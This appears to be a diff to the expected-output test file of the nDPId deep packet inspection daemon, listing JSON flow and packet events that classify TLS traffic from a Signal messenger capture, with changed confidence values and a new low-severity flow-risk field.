-00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264090,"flow_last_seen":1569051264369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264369,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":234,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264090,"flow_last_seen":1569051264369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264369,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} -00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":238,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264093,"flow_last_seen":1569051264373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":239,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264093,"flow_last_seen":1569051264373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} -00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264091,"flow_last_seen":1569051264373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":241,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264091,"flow_last_seen":1569051264374,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264374,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":203,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264093,"flow_last_seen":1569051264259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264259,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01032{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":228,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264073,"flow_last_seen":1569051264342,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1637,"flow_avg_l4_payload_len":272,"midstream":0,"thread_ts_msec":1569051264342,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01421{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":229,"source":"signal.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264073,"flow_last_seen":1569051264343,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2666,"flow_avg_l4_payload_len":380,"midstream":0,"thread_ts_msec":1569051264343,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":49227,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":233,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264090,"flow_last_seen":1569051264369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264369,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":234,"source":"signal.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264090,"flow_last_seen":1569051264369,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264369,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57023,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":238,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264093,"flow_last_seen":1569051264373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":239,"source":"signal.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264093,"flow_last_seen":1569051264373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57025,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":240,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264091,"flow_last_seen":1569051264373,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264373,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":241,"source":"signal.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264091,"flow_last_seen":1569051264374,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264374,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57024,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":295,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051264666,"flow_last_seen":1569051264666,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569051264666,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":295,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1569051264666,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569051264666,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGUS7AqAIRI6kDKN7CAbvJrSrvAAAAALAC\/\/+7dwAAAgQFtAEDAwcBAQgKKFWUiQAAAAAEAgAA"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":319,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1569051264775,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569051264775,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAAO4G4zEjqQMowKgCEQG73sL5Zid4ya0q8KASaN+dwQAAAgQFrAQCCApkFUDdKFWUiQEDAwg="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":320,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":3,"flow_last_seen":1569051264776,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569051264776,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGUTrAqAIRI6kDKN7CAbvJrSrw+WYneYAQBAsw7wAAAQEICihVlPVkFUDd"} -00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":321,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264666,"flow_last_seen":1569051264776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264776,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":323,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264666,"flow_last_seen":1569051264887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264887,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} -01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":324,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264666,"flow_last_seen":1569051264887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264887,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} +00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":321,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569051264666,"flow_last_seen":1569051264776,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569051264776,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +00961{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":323,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569051264666,"flow_last_seen":1569051264887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569051264887,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2"}} +01350{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":324,"source":"signal.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1569051264666,"flow_last_seen":1569051264887,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2995,"flow_avg_l4_payload_len":427,"midstream":0,"thread_ts_msec":1569051264887,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"35.169.3.40","src_port":57026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Signal","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"textsecure-service.whispersystems.org","server_names":"textsecure-service.whispersystems.org,service.signal.org","ja3":"6725ca90906e1036febcbfd464e2e326","ja3s":"1089ea6f0461a29006cc96dfe7a11d80","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=California, L=San Francisco, O=Open Whisper Systems, OU=Open Whisper Systems, CN=TextSecure","subjectDN":"C=US, ST=California, O=Open Whisper Systems, OU=Open Whisper Systems, CN=textsecure-service.whispersystems.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2","fingerprint":"5E:9E:63:F5:69:45:C7:DC:E6:4D:26:68:36:7E:C2:68:DB:02:60:8B"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":357,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569051266396,"flow_last_seen":1569051266396,"flow_idle_time":7580000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":1,"thread_ts_msec":1569051266396,"l3_proto":"ip4","src_ip":"23.57.24.16","dst_ip":"192.168.2.17","src_port":443,"dst_port":57016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":357,"source":"signal.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1569051266396,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1569051266396,"pkt":"xGGLNYKpxiwDYGpkCABFAABMyV0AADQGy0wXORgQwKgCEQG73rjhiC89LB07wYAYAQKY+AAAAQEICpZOcwIoVP9fFwMDABNN53WS+HQ+OdIkNGbGHI++PaTs"} 